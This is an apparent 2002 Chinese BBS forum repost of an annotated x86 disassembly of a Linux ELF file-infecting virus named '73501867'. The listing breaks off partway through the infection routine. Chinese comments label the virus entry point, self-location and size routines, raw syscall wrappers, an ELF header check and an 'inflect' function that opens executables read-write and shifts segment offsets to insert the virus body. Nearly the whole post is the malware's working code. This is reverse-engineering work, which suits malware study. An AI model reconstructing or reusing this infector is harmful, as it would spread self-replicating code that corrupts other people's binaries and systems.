荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: jjk (UNIX+C+XML+?? 傻了?), 信区: Linux
标 题: 73501867 virus(转寄)[转载]
发信站: 荔园晨风BBS站 (Wed Apr 24 18:09:49 2002), 转信
【 以下文字转载自 jjk 的信箱 】
【 原文由 jjk.bbs@apue.dhs.org 所发表 】
发信人: lgx (lgx), 信区: CompSci
标 题: 73501867 virus
发信站: UNIX编程 (Wed Apr 10 15:16:06 2002) , 转信
//跳转到病毒主函数
0x80484f8: jmp 0x8048519
0x80484fa: dec %edi
0x80484fb: push %ebx
0x80484fc: inc %esi
0x80484fd: and %ah,(%eax)
0x80484ff: and %ah,(%eax)
0x8048501: and %ah,(%eax)
0x8048503: and %ah,(%eax)
0x8048505: and %ah,(%eax)
0x8048507: and %ah,(%eax)
0x8048509: and %ah,(%eax)
0x804850b: and %ah,(%eax)
0x804850d: and %ah,(%eax)
0x804850f: and %ah,(%eax)
0x8048511: and %ah,(%eax)
0x8048513: and %ah,(%eax)
0x8048515: and %ah,(%eax)
0x8048517: and %ah,(%eax)
//病毒主函数 int virus_main()
0x8048519: mov $0x8048330,%eax
0x804851e: pusha
0x804851f: call 0x80493e4
0x8048524: popa
0x8048525: jmp *%eax
0x8048527: nop
// 未知,返回 34 ,可能是ELF的一个结构大小
0x8048528: push %ebp
0x8048529: mov %esp,%ebp
0x804852b: mov $0x21,%eax
0x8048530: inc %eax
0x8048531: leave
0x8048532: ret
0x8048533: nop
//得到病毒体开始位置的绝对地址 ulong get_virus_start() = 0x80484f8
0x8048534: push %ebp
0x8048535: mov %esp,%ebp
0x8048537: jmp 0x8048541
0x8048539: pop %eax
0x804853a: sub $0x4e,%eax
0x804853f: jmp 0x8048546
0x8048541: call 0x8048539
0x8048546: leave
0x8048547: ret
//得到病毒大小 int get_?() = 3974
0x8048548: push %ebp
0x8048549: mov %esp,%ebp
0x804854b: mov $0xf86,%eax
0x8048550: leave
0x8048551: ret
0x8048552: mov %esi,%esi
//系统调用 int syscall(int no)
0x8048554: push %ebp
0x8048555: mov %esp,%ebp
0x8048557: mov 0x8(%esp,1),%eax
0x804855b: int $0x80
0x804855d: leave
0x804855e: ret
0x804855f: nop
//系统调用 int syscall1(int no,long param1)
0x8048560: push %ebp
0x8048561: mov %esp,%ebp
0x8048563: push %ebx
0x8048564: mov 0xc(%esp,1),%eax
0x8048568: mov 0x10(%esp,1),%ebx
0x804856c: int $0x80
0x804856e: pop %ebx
0x804856f: leave
0x8048570: ret
0x8048571: lea 0x0(%esi),%esi
//系统调用 int syscall2(int no,long param1,long param2)
0x8048574: push %ebp
0x8048575: mov %esp,%ebp
0x8048577: push %ebx
0x8048578: push %ecx
0x8048579: mov 0x10(%esp,1),%eax
0x804857d: mov 0x14(%esp,1),%ebx
0x8048581: mov 0x18(%esp,1),%ecx
0x8048585: int $0x80
0x8048587: pop %ecx
0x8048588: pop %ebx
0x8048589: leave
0x804858a: ret
0x804858b: nop
//系统调用 int syscall3(int no,long param1,long param2,long param3)
0x804858c: push %ebp
0x804858d: mov %esp,%ebp
0x804858f: push %ebx
0x8048590: push %ecx
0x8048591: push %edx
0x8048592: mov 0x14(%esp,1),%eax
0x8048596: mov 0x18(%esp,1),%ebx
0x804859a: mov 0x1c(%esp,1),%ecx
0x804859e: mov 0x20(%esp,1),%edx
0x80485a2: int $0x80
0x80485a4: pop %edx
0x80485a5: pop %ecx
0x80485a6: pop %ebx
0x80485a7: leave
0x80485a8: ret
0x80485a9: lea 0x0(%esi),%esi
//int sbrk(inc)
0x80485ac: push %ebp
0x80485ad: mov %esp,%ebp
0x80485af: push %esi
0x80485b0: push %ebx
0x80485b1: mov 0x8(%ebp),%ebx
0x80485b4: push $0x0
0x80485b6: push $0x2d
0x80485b8: call 0x8048560 ; syscall1(0x2d,0) = sbrk
0x80485bd: mov %eax,%esi
0x80485bf: add %esi,%ebx
0x80485c1: push %ebx
0x80485c2: push $0x2d
0x80485c4: call 0x8048560
0x80485c9: cmp %esi,%eax
0x80485cb: je 0x80485d4
0x80485cd: mov %esi,%eax
0x80485cf: jmp 0x80485d6
0x80485d1: lea 0x0(%esi),%esi
0x80485d4: xor %eax,%eax
0x80485d6: lea 0xfffffff8(%ebp),%esp
0x80485d9: pop %ebx
0x80485da: pop %esi
0x80485db: leave
0x80485dc: ret
0x80485dd: lea 0x0(%esi),%esi
//read
0x80485e0: push %ebp
0x80485e1: mov %esp,%ebp
0x80485e3: push %edi
0x80485e4: push %esi
0x80485e5: push %ebx
0x80485e6: mov 0x8(%ebp),%edi
0x80485e9: mov 0xc(%ebp),%esi
0x80485ec: mov 0x10(%ebp),%ebx
0x80485ef: nop
0x80485f0: push %ebx
0x80485f1: push %esi
0x80485f2: push %edi
0x80485f3: push $0x3
0x80485f5: call 0x804858c
0x80485fa: add $0x10,%esp
0x80485fd: cmp %ebx,%eax
0x80485ff: jne 0x8048608
0x8048601: mov $0x1,%eax
0x8048606: jmp 0x804861c
0x8048608: test %eax,%eax
0x804860a: jg 0x8048614
0x804860c: test %ebx,%ebx
0x804860e: jle 0x8048614
0x8048610: xor %eax,%eax
0x8048612: jmp 0x804861c
0x8048614: sub %eax,%ebx
0x8048616: add %al,(%esi)
0x8048618: jmp 0x80485f0
0x804861a: mov %esi,%esi
0x804861c: lea 0xfffffff4(%ebp),%esp
0x804861f: pop %ebx
0x8048620: pop %esi
0x8048621: pop %edi
0x8048622: leave
0x8048623: ret
//write
0x8048624: push %ebp
0x8048625: mov %esp,%ebp
0x8048627: push %edi
0x8048628: push %esi
0x8048629: push %ebx
0x804862a: mov 0x8(%ebp),%edi
0x804862d: mov 0xc(%ebp),%esi
0x8048630: mov 0x10(%ebp),%ebx
0x8048633: nop
0x8048634: push %ebx
0x8048635: push %esi
0x8048636: push %edi
0x8048637: push $0x4
0x8048639: call 0x804858c
0x804863e: add $0x10,%esp
0x8048641: cmp %ebx,%eax
0x8048643: jne 0x804864c
0x8048645: mov $0x1,%eax
0x804864a: jmp 0x8048660
0x804864c: test %eax,%eax
0x804864e: jg 0x8048658
0x8048650: test %ebx,%ebx
0x8048652: jle 0x8048658
0x8048654: xor %eax,%eax
0x8048656: jmp 0x8048660
0x8048658: sub %eax,%ebx
0x804865a: add %al,(%esi)
0x804865c: jmp 0x8048634
0x804865e: mov %esi,%esi
0x8048660: lea 0xfffffff4(%ebp),%esp
0x8048663: pop %ebx
0x8048664: pop %esi
0x8048665: pop %edi
0x8048666: leave
0x8048667: ret
//lseek
0x8048668: push %ebp
0x8048669: mov %esp,%ebp
0x804866b: push %ebx
0x804866c: mov 0xc(%ebp),%ebx
0x804866f: pushl 0x10(%ebp)
0x8048672: push %ebx
0x8048673: pushl 0x8(%ebp)
0x8048676: push $0x13
0x8048678: call 0x804858c
0x804867d: cmp %ebx,%eax
0x804867f: jne 0x8048688
0x8048681: mov $0x1,%eax
0x8048686: jmp 0x804868a
0x8048688: xor %eax,%eax
0x804868a: mov 0xfffffffc(%ebp),%ebx
0x804868d: leave
0x804868e: ret
0x804868f: nop
//strncmp
0x8048690: push %ebp
0x8048691: mov %esp,%ebp
0x8048693: push %esi
0x8048694: push %ebx
0x8048695: mov 0x8(%ebp),%esi
0x8048698: mov 0xc(%ebp),%ebx
0x804869b: mov 0x10(%ebp),%ecx
0x804869e: xor %edx,%edx
0x80486a0: cmp %ecx,%edx
0x80486a2: jge 0x80486b5
0x80486a4: mov (%edx,%ebx,1),%al
0x80486a7: cmp %al,(%edx,%esi,1)
0x80486aa: je 0x80486b0
0x80486ac: xor %eax,%eax
0x80486ae: jmp 0x80486ba
0x80486b0: inc %edx
0x80486b1: cmp %ecx,%edx
0x80486b3: jl 0x80486a4
0x80486b5: mov $0x1,%eax
0x80486ba: lea 0xfffffff8(%ebp),%esp
0x80486bd: pop %ebx
0x80486be: pop %esi
0x80486bf: leave
0x80486c0: ret
0x80486c1: lea 0x0(%esi),%esi
//void *memset(void *s, int c, size_t n);
0x80486c4: push %ebp
0x80486c5: mov %esp,%ebp
0x80486c7: push %ebx
0x80486c8: mov 0x8(%ebp),%ebx
0x80486cb: mov 0x10(%ebp),%edx
0x80486ce: mov 0xc(%ebp),%cl
0x80486d1: xor %eax,%eax
0x80486d3: cmp %edx,%eax
0x80486d5: jge 0x80486e0
0x80486d7: nop
0x80486d8: mov %cl,(%eax,%ebx,1)
0x80486db: inc %eax
0x80486dc: cmp %edx,%eax
0x80486de: jl 0x80486d8
0x80486e0: mov 0xfffffffc(%ebp),%ebx
0x80486e3: leave
0x80486e4: ret
0x80486e5: lea 0x0(%esi),%esi
//strlen
0x80486e8: push %ebp
0x80486e9: mov %esp,%ebp
0x80486eb: mov 0x8(%ebp),%edx
0x80486ee: xor %eax,%eax
0x80486f0: cmpb $0x0,(%edx)
0x80486f3: je 0x80486ff
0x80486f5: lea 0x0(%esi),%esi
0x80486f8: inc %edx
0x80486f9: inc %eax
0x80486fa: cmpb $0x0,(%edx)
0x80486fd: jne 0x80486f8
0x80486ff: leave
0x8048700: ret
0x8048701: lea 0x0(%esi),%esi
// char *strncpy(char *dest, const char *src, size_t n);
0x8048704: push %ebp
0x8048705: mov %esp,%ebp
0x8048707: push %ebx
0x8048708: mov 0x10(%ebp),%edx
0x804870b: mov 0x8(%ebp),%ebx
0x804870e: mov 0xc(%ebp),%ecx
0x8048711: test %edx,%edx
0x8048713: jle 0x8048723
0x8048715: lea 0x0(%esi),%esi
0x8048718: mov (%ecx),%al
0x804871a: mov %al,(%ebx)
0x804871c: inc %ebx
0x804871d: inc %ecx
0x804871e: dec %edx
0x804871f: test %edx,%edx
0x8048721: jg 0x8048718
0x8048723: mov 0xfffffffc(%ebp),%ebx
0x8048726: leave
0x8048727: ret
0x8048728: push %ebp
0x8048729: mov %esp,%ebp
0x804872b: sub $0x4,%esp
0x804872e: push %esi
0x804872f: push %ebx
0x8048730: mov 0x8(%ebp),%esi
0x8048733: xor %ecx,%ecx
0x8048735: test %esi,%esi
0x8048737: jg 0x8048740
0x8048739: mov $0x1,%eax
0x804873e: jmp 0x8048761
0x8048740: mov $0x66666667,%ebx
0x8048745: lea 0x0(%esi),%esi
0x8048748: mov %esi,%eax
0x804874a: imul %ebx,%eax
0x804874c: sar $0x2,%edx
0x804874f: sar $0x1f,%esi
0x8048752: mov %esi,0xfffffffc(%ebp)
0x8048755: mov %edx,%esi
0x8048757: sub 0xfffffffc(%ebp),%esi
0x804875a: inc %ecx
0x804875b: test %esi,%esi
0x804875d: jg 0x8048748
0x804875f: mov %ecx,%eax
0x8048761: lea 0xfffffff4(%ebp),%esp
0x8048764: pop %ebx
0x8048765: pop %esi
0x8048766: leave
0x8048767: ret
//一个参数:指向存放/proc/uptime的缓冲区
//atoi
0x8048768: push %ebp
0x8048769: mov %esp,%ebp
0x804876b: sub $0x8,%esp
0x804876e: push %edi
0x804876f: push %esi
0x8048770: push %ebx
0x8048771: xor %esi,%esi
0x8048773: movl $0x0,0xfffffff8(%ebp)
0x804877a: mov 0x8(%ebp),%edi ; *edi 为
/proc/uptime内容
0x804877d: mov (%edi),%al
0x804877f: jmp 0x804878b
0x8048781: lea 0x0(%esi),%esi
0x8048784: inc %esi
0x8048785: mov 0x8(%ebp),%edi
0x8048788: mov (%esi,%edi,1),%al
0x804878b: add $0xd0,%al
0x804878d: cmp $0x9,%al
0x804878f: jbe 0x8048784 ; 是数字
则继续循环
0x8048791: xor %ebx,%ebx
0x8048793: cmp %esi,%ebx
0x8048795: jge 0x80487ca
0x8048797: lea 0xffffffff(%esi),%edi
0x804879a: mov %edi,0xfffffffc(%ebp)
0x804879d: lea 0x0(%esi),%esi
0x80487a0: mov 0x8(%ebp),%edi
0x80487a3: movsbl (%ebx,%edi,1),%eax
0x80487a7: add $0xffffffd0,%eax ; char -> int
0x80487aa: xor %ecx,%ecx
0x80487ac: mov 0xfffffffc(%ebp),%edx ; edx = esi - 1
0x80487af: sub %ebx,%edx
0x80487b1: cmp %edx,%ecx
0x80487b3: jge 0x80487c2
0x80487b5: lea 0x0(%esi),%esi ; esi 为第一个非
数字字符偏移
0x80487b8: lea (%eax,%eax,4),%eax
0x80487bb: add %eax,%eax
0x80487bd: inc %ecx
0x80487be: cmp %edx,%ecx
0x80487c0: jl 0x80487b8 ; 循环
edx 次
0x80487c2: add %eax,0xfffffff8(%ebp)
0x80487c5: inc %ebx
0x80487c6: cmp %esi,%ebx
0x80487c8: jl 0x80487a0 ; 循环
esi 次
0x80487ca: mov 0xfffffff8(%ebp),%eax
0x80487cd: lea 0xffffffec(%ebp),%esp
0x80487d0: pop %ebx
0x80487d1: pop %esi
0x80487d2: pop %edi
0x80487d3: leave
0x80487d4: ret
0x80487d5: lea 0x0(%esi),%esi
//得到一个字符串数组的起始地址 char *
0x80487d8: push %ebp
0x80487d9: mov %esp,%ebp
0x80487db: jmp 0x80487e0
0x80487dd: pop %eax
0x80487de: jmp 0x8048803
0x80487e0: call 0x80487dd
0x80487e5: 0x607d7f20 0x2000206c 0x006a776a 0x607d7f20
0x80487f5: 0x7f7a206c 0x6a62667b 0x666d2000 0xc3c90061
0x8048803: leave
0x8048804: ret
0x8048805: lea 0x0(%esi),%esi
//func(param1,buf,buflen) 0x00000002 0xbfffe9d0 0x00000080
//运行后buf内容:0=/proc/ 1=/exe 2=/proc/uptime, 3=/bin
0x8048808: push %ebp
0x8048809: mov %esp,%ebp
0x804880b: sub $0x4,%esp
0x804880e: push %edi
0x804880f: push %esi
0x8048810: push %ebx
0x8048811: mov 0x8(%ebp),%ebx
0x8048814: call 0x80487d8
0x8048819: mov %eax,%esi ; esi: 固定字符串起始地址
0x804881b: test %ebx,%ebx
0x804881d: jle 0x804882b ; ebx <= 0
0x804881f: nop
0x8048820: cmpb $0x0,(%esi)
0x8048823: jne 0x8048826
0x8048825: dec %ebx
0x8048826: inc %esi
0x8048827: test %ebx,%ebx
0x8048829: jg 0x8048820
0x804882b: mov 0x10(%ebp),%eax
0x804882e: push %eax
0x804882f: push $0x0
0x8048831: mov 0xc(%ebp),%edi
0x8048834: push %edi
0x8048835: call 0x80486c4 ; memset(
0x804883a: mov %esi,%edx
0x804883c: mov %edx,%edi
0x804883e: xor %eax,%eax
0x8048840: cld
0x8048841: mov $0xffffffff,%ecx
0x8048846: repnz scas %es:(%edi),%al
0x8048848: not %ecx
0x804884a: dec %ecx ; ecx: 第一个字符串的长度
0x804884b: mov 0x10(%ebp),%eax
0x804884e: cmp %eax,%ecx
0x8048850: ja 0x8048868
0x8048852: mov %esi,%edi
0x8048854: xor %eax,%eax
0x8048856: cld
0x8048857: mov $0xffffffff,%ecx
0x804885c: repnz scas %es:(%edi),%al
0x804885e: not %ecx
0x8048860: lea 0xffffffff(%ecx),%ebx
0x8048863: jmp 0x804886b
0x8048865: lea 0x0(%esi),%esi
0x8048868: mov 0x10(%ebp),%ebx
0x804886b: xor %ecx,%ecx
0x804886d: cmp %ebx,%ecx
0x804886f: jge 0x8048899
0x8048871: lea 0x0(%esi),%esi
0x8048874: mov (%ecx,%esi,1),%dl
0x8048877: test %dl,%dl
0x8048879: je 0x8048894
0x804887b: mov %dl,0xfffffffc(%ebp)
0x804887e: andb $0xf0,0xfffffffc(%ebp)
0x8048882: sub 0xfffffffc(%ebp),%dl
0x8048885: addb $0xf,0xfffffffc(%ebp)
0x8048889: mov 0xfffffffc(%ebp),%al
0x804888c: sub %dl,%al
0x804888e: mov 0xc(%ebp),%edi
0x8048891: mov %al,(%ecx,%edi,1)
0x8048894: inc %ecx
0x8048895: cmp %ebx,%ecx
0x8048897: jl 0x8048874
0x8048899: lea 0xfffffff0(%ebp),%esp
0x804889c: pop %ebx
0x804889d: pop %esi
0x804889e: pop %edi
0x804889f: leave
0x80488a0: ret
0x80488a1: lea 0x0(%esi),%esi
0x80488a4: push %ebp
0x80488a5: mov %esp,%ebp
0x80488a7: sub $0x100c,%esp
0x80488ad: push %edi
0x80488ae: push %esi
0x80488af: push %ebx
0x80488b0: mov 0x40(%ebp),%eax
0x80488b3: xor %ebx,%ebx
0x80488b5: movzwl 0x38(%ebp),%edx
0x80488b9: cmp %edx,%ebx
0x80488bb: jge 0x80488df
0x80488bd: lea 0x0(%esi),%esi
0x80488c0: cmpl $0x0,0x4(%eax)
0x80488c4: jne 0x80488d0
0x80488c6: cmpl $0x1,(%eax)
0x80488c9: jne 0x80488d7
0x80488cb: mov %eax,%esi
0x80488cd: jmp 0x80488d7
0x80488cf: nop
0x80488d0: cmpl $0x1,(%eax)
0x80488d3: jne 0x80488d7
0x80488d5: mov %eax,%ecx
0x80488d7: add $0x20,%eax
0x80488da: inc %ebx
0x80488db: cmp %edx,%ebx
0x80488dd: jl 0x80488c0
0x80488df: mov 0x8(%esi),%edx
0x80488e2: mov %edx,%eax
0x80488e4: add 0x10(%esi),%eax
0x80488e7: mov 0x8(%ecx),%ecx
0x80488ea: sub %eax,%ecx
0x80488ec: mov %ecx,%eax
0x80488ee: cmp $0xfff,%eax
0x80488f3: jle 0x8048900
0x80488f5: mov $0x3,%eax
0x80488fa: jmp 0x80489de
0x80488ff: nop
0x8048900: mov 0x24(%ebp),%eax
0x8048903: mov %eax,%ecx
0x8048905: sub %edx,%ecx
0x8048907: add 0x4(%esi),%ecx
0x804890a: add 0x14(%esi),%edx
0x804890d: sub %eax,%edx
0x804890f: lea 0xffffffff(%edx),%eax
0x8048912: cmp $0xfff,%eax
0x8048917: jbe 0x8048924
0x8048919: mov $0x2,%eax
0x804891e: jmp 0x80489de
0x8048923: nop
0x8048924: cmp $0x1000,%edx
0x804892a: ja 0x8048930
0x804892c: mov %edx,%esi
0x804892e: jmp 0x8048935
0x8048930: mov $0x1000,%esi
0x8048935: push $0x0
0x8048937: push %ecx
0x8048938: mov 0x8(%ebp),%edi
0x804893b: push %edi
0x804893c: call 0x8048668
0x8048941: add $0xc,%esp
0x8048944: test %eax,%eax
0x8048946: je 0x80489cd
0x804894c: push %esi
0x804894d: lea 0xfffff000(%ebp),%edi
0x8048953: mov %edi,0xffffeff4(%ebp)
0x8048959: push %edi
0x804895a: mov 0x8(%ebp),%edi
0x804895d: push %edi
0x804895e: call 0x80485e0
0x8048963: cmp $0x1,%eax
0x8048966: jne 0x80489cd
0x8048968: xor %ebx,%ebx
0x804896a: lea 0xfffffffc(%esi),%eax
0x804896d: cmp %eax,%ebx
0x804896f: jge 0x80489cd
0x8048971: mov 0xffffeff4(%ebp),%edi
0x8048977: mov %edi,0xffffeff8(%ebp)
0x804897d: mov %eax,0xffffeffc(%ebp)
0x8048983: nop
0x8048984: mov 0xffffeff4(%ebp),%edi
0x804898a: mov (%edi),%esi
0x804898c: mov 0xffffeff8(%ebp),%edi
0x8048992: cmpb $0x0,0x3(%edi,%ebx,1)
0x8048997: je 0x80489be
0x8048999: xor %ecx,%ecx
0x804899b: movzwl 0x3c(%ebp),%edx
0x804899f: cmp %edx,%ecx
0x80489a1: jge 0x80489be
0x80489a3: mov %edx,%eax
0x80489a5: mov 0x44(%ebp),%edx
0x80489a8: add $0x4,%edx
0x80489ab: nop
0x80489ac: cmp 0x8(%edx),%esi
0x80489af: jne 0x80489b6
0x80489b1: cmpl $0x1,(%edx)
0x80489b4: je 0x80489d4
0x80489b6: add $0x28,%edx
0x80489b9: inc %ecx
0x80489ba: cmp %eax,%ecx
0x80489bc: jl 0x80489ac
0x80489be: incl 0xffffeff4(%ebp)
0x80489c4: inc %ebx
0x80489c5: cmp 0xffffeffc(%ebp),%ebx
0x80489cb: jl 0x8048984
0x80489cd: mov $0xffffffff,%eax
0x80489d2: jmp 0x80489de
0x80489d4: mov 0x48(%ebp),%eax
0x80489d7: mov %esi,(%eax)
0x80489d9: mov $0x1,%eax
0x80489de: lea 0xffffefe8(%ebp),%esp
0x80489e4: pop %ebx
0x80489e5: pop %esi
0x80489e6: pop %edi
0x80489e7: leave
0x80489e8: ret
0x80489e9: lea 0x0(%esi),%esi
// 检查参数是否为7f454c46 ???????? ??????? ???????? 0200 (03|06)00 01000000,是
返
回 1,否则0
// ELF 头合法性检查
0x80489ec: push %ebp
0x80489ed: mov %esp,%ebp
0x80489ef: mov 0x8(%ebp),%edx
0x80489f2: cmpb $0x7f,(%edx)
0x80489f5: jne 0x8048a34
0x80489f7: cmpb $0x45,0x1(%edx)
0x80489fb: jne 0x8048a34
0x80489fd: cmpb $0x4c,0x2(%edx)
0x8048a01: jne 0x8048a34
0x8048a03: cmpb $0x46,0x3(%edx)
0x8048a07: jne 0x8048a34
0x8048a09: cmpw $0x2,0x10(%edx)
0x8048a0e: jne 0x8048a34
0x8048a10: mov 0x12(%edx),%ax
0x8048a14: cmp $0x3,%ax
0x8048a18: je 0x8048a20
0x8048a1a: cmp $0x6,%ax
0x8048a1e: jne 0x8048a34
0x8048a20: cmpl $0x1,0x14(%edx)
0x8048a24: jne 0x8048a34
0x8048a26: cmpw $0x1,0xa(%edx)
0x8048a2b: ja 0x8048a34
0x8048a2d: mov $0x1,%eax
0x8048a32: jmp 0x8048a36
0x8048a34: xor %eax,%eax
0x8048a36: leave
0x8048a37: ret
// 感染函数 inflect(char *filename,buf,buflen)
0x8048a38: push %ebp
0x8048a39: mov %esp,%ebp
0x8048a3b: sub $0xf8,%esp
0x8048a41: push %edi
0x8048a42: push %esi
0x8048a43: push %ebx
0x8048a44: lea 0xffffff4c(%ebp),%eax
0x8048a4a: push %eax
0x8048a4b: mov 0x8(%ebp),%ecx
0x8048a4e: push %ecx
0x8048a4f: push $0x6a
0x8048a51: call 0x8048574 ; stat()
0x8048a56: add $0xc,%esp
0x8048a59: test %eax,%eax
0x8048a5b: jl 0x804910d
0x8048a61: mov 0xffffff6c(%ebp),%eax ; st_size
0x8048a67: mov %eax,0xffffff44(%ebp) ; int size;
0x8048a6d: mov 0xffffff74(%ebp),%eax ; st_atime
0x8048a73: lea 0xffffff44(%ebp),%ecx
0x8048a79: mov %ecx,0xffffff14(%ebp) ; int *psize = &size;
0x8048a7f: mov %eax,0x4(%ecx) ; atime
0x8048a82: push $0x0
0x8048a84: push $0x2
0x8048a86: mov 0x8(%ebp),%ecx
0x8048a89: push %ecx
0x8048a8a: push $0x5
0x8048a8c: call 0x804858c ;syscall3 = open(file,O_RDWR,0);
0x8048a91: mov %eax,0xffffff3c(%ebp) ; 返回的文件描述符
0x8048a97: add $0x10,%esp
0x8048a9a: test %eax,%eax
0x8048a9c: jl 0x80490f6
0x8048aa2: push $0x34
0x8048aa4: lea 0xffffff8c(%ebp),%ecx
0x8048aa7: mov %ecx,0xffffff0c(%ebp)
0x8048aad: mov %ecx,0xffffff38(%ebp)
0x8048ab3: push %ecx
0x8048ab4: mov 0xffffff3c(%ebp),%ecx
0x8048aba: push %ecx
0x8048abb: call 0x80485e0 ; read ,读 ELF 文件头
0x8048ac0: add $0xc,%esp
0x8048ac3: test %eax,%eax
0x8048ac5: je 0x80490f6
0x8048acb: mov 0xffffff0c(%ebp),%ecx
0x8048ad1: push %ecx
0x8048ad2: call 0x80489ec ; ELF 头合法性检查
0x8048ad7: add $0x4,%esp
0x8048ada: test %eax,%eax
0x8048adc: je 0x80490f6
0x8048ae2: mov %esp,0xffffff34(%ebp)
0x8048ae8: movzwl 0xffffffb8(%ebp),%edi
0x8048aec: movzwl 0xffffffbc(%ebp),%eax
0x8048af0: mov %edi,0xffffff30(%ebp)
0x8048af6: shll $0x5,0xffffff30(%ebp)
0x8048afd: sub 0xffffff30(%ebp),%esp
0x8048b03: mov %esp,0xffffff2c(%ebp)
0x8048b09: xor %ebx,%ebx
0x8048b0b: movl $0x0,0xffffff28(%ebp)
0x8048b15: lea (%eax,%eax,4),%eax
0x8048b18: shl $0x3,%eax
0x8048b1b: mov %eax,0xffffff1c(%ebp)
0x8048b21: sub %eax,%esp
0x8048b23: mov %esp,0xffffff18(%ebp)
0x8048b29: push $0x0
0x8048b2b: pushl 0xffffffa8(%ebp)
0x8048b2e: mov 0xffffff3c(%ebp),%ecx
0x8048b34: push %ecx
0x8048b35: call 0x8048668 ; lseek
0x8048b3a: add $0xc,%esp
0x8048b3d: test %eax,%eax
0x8048b3f: je 0x80490f0
0x8048b45: mov 0xffffff30(%ebp),%ecx
0x8048b4b: push %ecx
0x8048b4c: mov 0xffffff2c(%ebp),%ecx
0x8048b52: push %ecx
0x8048b53: mov 0xffffff3c(%ebp),%ecx
0x8048b59: push %ecx
0x8048b5a: call 0x80485e0 ; read
0x8048b5f: add $0xc,%esp
0x8048b62: test %eax,%eax
0x8048b64: je 0x80490f0
0x8048b6a: push $0x0
0x8048b6c: pushl 0xffffffac(%ebp)
0x8048b6f: mov 0xffffff3c(%ebp),%ecx
0x8048b75: push %ecx
0x8048b76: call 0x8048668 ; lseek
0x8048b7b: add $0xc,%esp
0x8048b7e: test %eax,%eax
0x8048b80: je 0x80490f0
0x8048b86: mov 0xffffff1c(%ebp),%ecx
0x8048b8c: push %ecx
0x8048b8d: mov 0xffffff18(%ebp),%ecx
0x8048b93: push %ecx
0x8048b94: mov 0xffffff3c(%ebp),%ecx
0x8048b9a: push %ecx
0x8048b9b: call 0x80485e0 ; read
0x8048ba0: add $0xc,%esp
0x8048ba3: test %eax,%eax
0x8048ba5: je 0x80490f0
0x8048bab: movl $0x0,0xffffff08(%ebp)
0x8048bb5: cmp %edi,%ebx
0x8048bb7: jge 0x8048bfb
0x8048bb9: mov 0xffffff2c(%ebp),%esi
0x8048bbf: add $0x4,%esi
0x8048bc2: mov 0xffffff2c(%ebp),%eax
0x8048bc8: xor %edx,%edx
0x8048bca: mov %esi,%esi
0x8048bcc: cmpl $0x0,(%esi,%edx,1)
0x8048bd0: jne 0x8048bdc
0x8048bd2: cmpl $0x1,(%eax)
0x8048bd5: jne 0x8048be7
0x8048bd7: mov %eax,%ebx
0x8048bd9: jmp 0x8048be7
0x8048bdb: nop
0x8048bdc: cmpl $0x1,(%eax)
0x8048bdf: jne 0x8048be7
0x8048be1: mov %eax,0xffffff28(%ebp)
0x8048be7: add $0x20,%eax
0x8048bea: add $0x20,%edx
0x8048bed: incl 0xffffff08(%ebp)
0x8048bf3: cmp %edi,0xffffff08(%ebp)
0x8048bf9: jl 0x8048bcc
0x8048bfb: test %ebx,%ebx
0x8048bfd: je 0x80490f0
0x8048c03: cmpl $0x0,0xffffff28(%ebp)
0x8048c0a: je 0x80490f0
0x8048c10: mov 0x10(%ebx),%ecx
0x8048c13: mov %ecx,0xffffff24(%ebp)
0x8048c19: mov 0x4(%ebx),%ecx
0x8048c1c: add %ecx,0xffffff24(%ebp)
0x8048c22: mov 0x14(%ebx),%ecx
0x8048c25: mov %ecx,0xffffff20(%ebp)
0x8048c2b: mov 0x8(%ebx),%ecx
0x8048c2e: add %ecx,0xffffff20(%ebp)
0x8048c34: lea 0xffffff40(%ebp),%ecx
0x8048c3a: mov %ecx,0xffffff10(%ebp)
0x8048c40: push %ecx
0x8048c41: mov 0xffffff18(%ebp),%ecx
0x8048c47: push %ecx
0x8048c48: mov 0xffffff2c(%ebp),%ecx
0x8048c4e: push %ecx
0x8048c4f: add $0xffffffcc,%esp
0x8048c52: mov %esp,%edi
0x8048c54: mov 0xffffff38(%ebp),%esi
0x8048c5a: cld
0x8048c5b: mov $0xd,%ecx
0x8048c60: repz movsl %ds:(%esi),%es:(%edi)
0x8048c62: mov 0xffffff3c(%ebp),%ecx
0x8048c68: push %ecx
0x8048c69: call 0x80488a4 ; ???
0x8048c6e: add $0x44,%esp
0x8048c71: cmp $0x1,%eax
0x8048c74: je 0x8048f50
0x8048c7a: jle 0x80490f0
0x8048c80: cmp $0x2,%eax
0x8048c83: je 0x8048fac
0x8048c89: cmp $0x3,%eax
0x8048c8c: jne 0x80490f0
0x8048c92: movl $0x0,0xffffff08(%ebp)
0x8048c9c: cmpw $0x0,0xffffffb8(%ebp)
0x8048ca1: je 0x8048d0b
0x8048ca3: mov 0xffffff2c(%ebp),%ebx
0x8048ca9: add $0x14,%ebx
0x8048cac: mov 0xffffff2c(%ebp),%esi
0x8048cb2: add $0x10,%esi
0x8048cb5: mov 0xffffff2c(%ebp),%edx
0x8048cbb: add $0x4,%edx
0x8048cbe: xor %edi,%edi
0x8048cc0: mov (%edx),%eax
0x8048cc2: cmp 0xffffff24(%ebp),%eax
0x8048cc8: jb 0x8048cd1
0x8048cca: add $0x1000,%eax
0x8048ccf: mov %eax,(%edx)
0x8048cd1: test %eax,%eax
0x8048cd3: jne 0x8048ced
0x8048cd5: mov 0xffffff2c(%ebp),%ecx
0x8048cdb: cmpl $0x1,(%ecx,%edi,1)
0x8048cdf: jne 0x8048ced
0x8048ce1: addl $0x1000,(%esi)
0x8048ce7: addl $0x1000,(%ebx)
0x8048ced: add $0x20,%ebx
0x8048cf0: add $0x20,%esi
0x8048cf3: add $0x20,%edx
0x8048cf6: add $0x20,%edi
0x8048cf9: incl 0xffffff08(%ebp)
0x8048cff: movzwl 0xffffffb8(%ebp),%eax
0x8048d03: cmp %eax,0xffffff08(%ebp)
0x8048d09: jl 0x8048cc0
0x8048d0b: movl $0x0,0xffffff08(%ebp)
0x8048d15: movzwl 0xffffffbc(%ebp),%esi
0x8048d19: cmp %esi,0xffffff08(%ebp)
0x8048d1f: jge 0x8048d52
0x8048d21: mov 0xffffff18(%ebp),%edx
0x8048d27: add $0x10,%edx
0x8048d2a: mov %esi,%esi
0x8048d2c: mov (%edx),%eax
0x8048d2e: cmp 0xffffff24(%ebp),%eax
0x8048d34: jbe 0x8048d41
0x8048d36: add $0x1000,%eax
0x8048d3b: mov %eax,(%edx)
0x8048d3d: movzwl 0xffffffbc(%ebp),%esi
0x8048d41: add $0x28,%edx
